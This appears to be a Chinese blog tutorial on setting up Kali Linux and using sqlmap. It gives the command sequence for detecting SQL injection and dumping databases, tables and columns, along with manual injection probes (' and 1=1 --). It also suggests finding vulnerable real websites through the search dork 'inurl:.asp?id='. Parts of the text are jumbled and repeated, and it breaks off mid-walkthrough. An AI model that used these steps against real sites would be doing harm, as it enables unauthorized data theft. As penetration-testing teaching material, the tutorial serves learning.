如何安装kali虚拟机：十一 网络安全.虚拟机VMware Kali安装入门及Sqlmap基本用法

如何安装kali虚拟机：十一 网络安全.虚拟机VMware Kali安装入门及Sqlmap基本用法列表显示表：sqlmap –u “链接” –D 数据库 --tables列库显示数据库：sqlmap –u “链接” --dbsSqlmap 是一款非常强大的开源渗透测试工具，用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎，由Python语言开发完成，通过外部连接访问数据库底层文件系统和操作系统，并执行命令实现渗透。Sqlmap的基本流程如下：找注入点并检测：sqlmap –u “链接”

13.Social Engineering Tools

打开某个软件，如下图所示。

五.SQLmap基本用法

下面作者结合Sqlmap简单讲述一个Kali环境中的实战案例。

Web漏洞包括网站本身漏洞、软件漏洞、服务器漏洞、外部攻击等，其拿站的基本方法包括通用型、SQL注入、DDoS、XXS跨站、越权漏洞、旁站注入、CSRF跨站请求、上传漏洞、支付漏洞等。

Sqlmap 是一款非常强大的开源渗透测试工具，用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎，由Python语言开发完成，通过外部连接访问数据库底层文件系统和操作系统，并执行命令实现渗透。

Sqlmap的基本流程如下：

找注入点并检测：sqlmap –u “链接”

列库显示数据库：sqlmap –u “链接” --dbs

列表显示表：sqlmap –u “链接” –D 数据库 --tables

列字段显示表中字段： sqlmap –u “链接” –D 数据库 –T 表名 --columns

爆内容显示字段内容：sqlmap –u “链接” –D 数据库 –T 表名 –C 字段 --dump

作者本来想以“实验吧”的CTF题目作为测试地址（http://ctf5.shiyanbar.com/8/index.php?id=1），但最近它维修中，无法访问；但使用“inurl:.asp?id=”未能搜索到目标网站。希望读者后续尝试“实验吧”的那个例子，或者自行搭建本地网站环境进行SQL注入学习。

第一步：寻找目标网站，通过浏览器“inurl:.asp?id=”搜索，寻找存在SQL注入漏洞的目标，可以先尝试手工注入判断。

判断注入点的方法很多，比如show.asp?code=115’ 加单引号，show.asp?code=115-1 减1，这里介绍一个经典的方法。

(1) http://xxxxx/show.asp?code=115’ and 1=1 – (正常显示)

对应的SQL语句：

select … from table where code=‘115’ and 1=1 – and xxxx;

单引号(’)匹配code='115，然后and连接，1=1恒成立，注释(–)掉后面语句。

(2) http://xxxxx/show.asp?code=115’ and 1=2 – (错误显示)

对应的SQL语句：

select … from table where code=‘115’ and 1=2 – and xxxx;

单引号(’)匹配code='115，然后and连接，1=2恒错误，注释(–)掉后面语句。

但很多网站都会有防火墙，防止SQL注入，如下图所示。

第二步：打开Kali环境中的Sqlmap环境，如下图所示。（后续采用之前的文章进行讲解，也希望读者自己尝试下）